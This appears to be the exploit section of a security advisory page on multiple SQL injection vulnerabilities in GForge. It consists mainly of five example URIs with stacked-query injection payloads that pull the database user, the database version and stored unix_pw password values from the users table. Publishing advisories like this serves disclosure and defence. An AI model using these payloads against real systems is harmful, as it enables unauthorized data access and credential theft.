• News
• Infocus
• Foundations
• Microsoft
• Unix
• IDS
• Incidents
• Virus
• Pen-Test
• Firewalls
• Columnists
• Mailing Lists
• Newsletters
• Bugtraq
• Focus on IDS
• Focus on Linux
• Focus on Microsoft
• Forensics
• Pen-test
• Security Basics
• Vuln Dev
• Vulnerabilities
• Jobs
• Job Opportunities
• Resumes
• Job Seekers
• Employers
• Tools
• RSS
• News
• Vulns
• Security Research

• info
• discussion
• exploit
• solution
• references

GForge Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URIs are available:

http://www.example.com/new/?group_id=&limit=50&offset=50;select 1 as id,CURRENT_USER as forum_id, version() as summary
http://www.example.com/news/?group_id=&limit=50&offset=50;select+1+as+id,unix_pw+as+forum_id,+user_name||unix_pw+as+summary+from+users
http://www.example.com/top/topusers.php?offset=0;select+1,version()+as+user_name,3,4,5;
http://www.example.com/frs/shownotes.php?release_id=*/+--+454&pub_sql=;select+1+as+is_public,1337+as+group_id,current_user+as+name,4+as+notes,version()+as+changes,6;/*
http://www.example.com/people/editprofile.php?skill_edit[]=1);select+1,2,3,version()+as+title,5,6;+--+&MultiEdit=Edit